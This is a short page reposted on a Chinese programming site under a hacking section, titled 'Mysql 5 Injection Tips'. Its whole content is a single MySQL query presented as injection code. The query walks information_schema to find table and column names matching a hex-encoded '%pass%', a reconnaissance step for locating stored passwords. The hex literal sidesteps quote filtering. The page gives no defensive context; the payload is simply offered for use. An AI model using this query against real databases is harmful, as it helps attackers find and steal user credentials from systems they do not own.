脚 本 之 家 www.jb51.net
页面导航: 首页网络编程黑客相关 → 正文内容 Mysql 5 Injection Tips

mysql5 注入漏洞

发布:dxy 字体:[增加 减小] 类型:转载
mysql5注入漏洞代码
复制代码 代码如下:

select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_schema`.`COLUMNS`.table_name=information_schema.tables.table_name where `information_schema`.`COLUMNS`.column_name like 0x257061737325 limit 0,1;

文章评论

共有 位脚本之家网友发表了评论我来说两句

最 近 更 新
热 点 排 行